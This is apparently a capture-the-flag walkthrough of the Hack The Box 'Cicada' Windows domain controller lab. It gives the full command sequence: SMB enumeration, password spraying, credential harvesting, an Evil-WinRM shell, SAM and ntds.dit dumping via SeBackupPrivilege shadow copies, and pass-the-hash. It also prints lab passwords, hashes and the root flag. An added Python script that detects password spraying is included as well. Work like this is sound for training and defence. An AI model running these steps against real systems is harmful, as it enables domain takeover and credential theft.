# Cicada

### Cicada HTB Detailed Walkthrough

### Initial Enumeration with Nmap

```bash
sudo nmap -p- -sVC 10.129.190.226
```

**Output:** Ports open include:

* 53 (DNS)
* 88 (Kerberos)
* 135, 139, 445 (SMB, RPC)
* 389/636 (LDAP/LDAPS)
* 3268/3269 (Global Catalog LDAP)
* 5985 (WinRM)
* 64827 (MSRPC)

Key details from the service scan: LDAP domain `cicada.htb`, hostname `CICADA-DC`, OS `Windows Server 2022` (a domain controller).

### Enumerate SMB Shares (Anonymous)

```bash
nxc smb 10.129.190.226 --shares
```

**Error:** `STATUS_USER_SESSION_DELETED` (the unauthenticated listing is rejected)

Retry as an anonymous/guest user with an empty password:

```bash
nxc smb 10.129.190.226 -u '.' -p '' --shares
```

**Output:** Shares found: `ADMIN$`, `C$`, `DEV`, `HR`, `IPC$`, `NETLOGON`, `SYSVOL`

### Access HR Share

```bash
smbclient -U '.' //10.129.190.226/HR
```

```bash
mget "Notice from HR.txt"
```

**File Content:** Default password provided: `Cicada$M6Corpb*@Lp#nZp!8`

### RID Brute Force Users

```bash
nxc smb 10.129.190.226 -u '.' -p '' --rid-brute
```

**Discovered Users:** `john.smoulder`, `sarah.dantelia`, `michael.wrightson`, `david.orelious`, `emily.oscars`, etc.

### Prepare User List and Password Spray

```bash
cat > users.txt <<EOF
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
EOF
```

```bash
nxc smb 10.129.190.226 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
```

**Valid login:** `michael.wrightson`
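The spray above leaves a characteristic trail on the DC: one source address producing failed logons (event 4625) against many different accounts in a short window, then a single success (event 4624). The following Python is an added detection example, not part of the original walkthrough; the log lines are constructed for this example in a simplified `key=value` layout rather than raw EVTX.

```python
"""Flag password-spray activity: one source IP failing against many distinct
accounts within a short window, and any successful logon from that source
inside the same window (the 'one valid hit' the spray is looking for)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events. EventID 4625 = failed logon, 4624 = successful logon.
SAMPLE_LOG = """\
2024-05-01T10:00:01 EventID=4625 TargetUser=Administrator SourceIp=10.10.14.5
2024-05-01T10:00:01 EventID=4625 TargetUser=Guest SourceIp=10.10.14.5
2024-05-01T10:00:02 EventID=4625 TargetUser=krbtgt SourceIp=10.10.14.5
2024-05-01T10:00:02 EventID=4625 TargetUser=john.smoulder SourceIp=10.10.14.5
2024-05-01T10:00:03 EventID=4625 TargetUser=sarah.dantelia SourceIp=10.10.14.5
2024-05-01T10:00:03 EventID=4624 TargetUser=michael.wrightson SourceIp=10.10.14.5
2024-05-01T10:00:04 EventID=4625 TargetUser=david.orelious SourceIp=10.10.14.5
2024-05-01T11:30:00 EventID=4625 TargetUser=emily.oscars SourceIp=10.10.14.9
"""


def parse(line):
    """Turn one constructed log line into a dict with a datetime 'ts' field."""
    ts, *fields = line.split()
    ev = dict(f.split("=", 1) for f in fields)
    ev["ts"] = datetime.fromisoformat(ts)
    return ev


def detect_spray(log_text, window=timedelta(minutes=5), min_accounts=5):
    """Return {source_ip: {"targets": [...], "successes": [...]}} for every
    source that failed against >= min_accounts distinct accounts within
    `window`; 'successes' lists accounts that logged on from that source
    inside the same window (likely compromised credentials)."""
    events = [parse(l) for l in log_text.splitlines() if l.strip()]
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev["SourceIp"]].append(ev)
    alerts = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        failures = [e for e in evs if e["EventID"] == "4625"]
        # Sliding window over failures, anchored at each failure in turn.
        for i, first in enumerate(failures):
            end = first["ts"] + window
            in_win = [e for e in failures[i:] if e["ts"] <= end]
            targets = sorted({e["TargetUser"] for e in in_win})
            if len(targets) >= min_accounts:
                successes = sorted({e["TargetUser"] for e in evs
                                    if e["EventID"] == "4624"
                                    and first["ts"] <= e["ts"] <= end})
                alerts[src] = {"targets": targets, "successes": successes}
                break
    return alerts
```

The single low-volume failure from `10.10.14.9` does not trip the threshold, while the spraying source is reported together with the account that succeeded.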

### Enumerate More Users (with Valid Creds)

```bash
nxc smb 10.129.190.226 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
```

**Found Note in Description:** `david.orelious: Just in case I forget my password is aRt$Lp#7t*VQ!3`

### Access DEV Share with david.orelious

```bash
smbclient -U 'david.orelious' //10.129.190.226/DEV
```

```bash
mget Backup_script.ps1
```

**Content Reveals Credentials:** User: `emily.oscars`, Pass: `Q!3@Lp#M6b*7t*Vt`

### Access C$ and Retrieve user.txt

```bash
smbclient -U 'emily.oscars' //10.129.190.226/C$
cd Users/emily.oscars.CICADA/Desktop
mget user.txt
```

### Spawn Shell with Evil-WinRM

```bash
evil-winrm -i 10.129.190.226 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
```

### Dump Local Hashes (SAM & SYSTEM)

```powershell
# Inside the Evil-WinRM session: save the SAM and SYSTEM hives, then pull them back
reg save HKLM\SAM SAM
reg save HKLM\SYSTEM SYSTEM
download sam
download system
```

```bash
# Impacket secretsdump in offline (LOCAL) mode against the downloaded hives
secretsdump local -sam sam -system system
```

**NT Hash Recovered:** `Administrator:2b87e7c93a3e8a0ea4a581937016f341`

### Confirm Administrator Access

```bash
nxc smb 10.129.190.226 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341
```

**Access Confirmed**

### Exploit SeBackupPrivilege (VSS Shadow Copy)

While the directory service is running, `ntds.dit` is locked, so it cannot be copied directly; instead a shadow copy of `C:` is created and exposed as `E:`, from which the file can be read with backup semantics. Create the diskshadow script:

```
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
```

Convert the script to CRLF line endings (which diskshadow expects) and upload it through the Evil-WinRM session:

```bash
unix2dos diskshadow.txt
upload diskshadow.txt
```

Run diskshadow:

```powershell
diskshadow /s diskshadow.txt
```

Copy `ntds.dit`:

```powershell
# /b uses backup semantics (SeBackupPrivilege), bypassing the file ACL
robocopy /b E:\Windows\ntds . ntds.dit
download ntds.dit
```

### Dump Domain Secrets

```bash
# Uses the SYSTEM hive saved earlier to decrypt the NTDS database
secretsdump local -system system -ntds ntds.dit
```

The output confirms the Administrator hash recovered from the SAM and yields the NT hashes of the remaining domain users.

### Administrator WinRM Access & Root Flag

```bash
evil-winrm -i 10.129.190.226 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341
cd \Users\Administrator\Desktop
cat root.txt
```

**Root Flag:** `8921a5862c5fb0324cac27bcd44a833c`
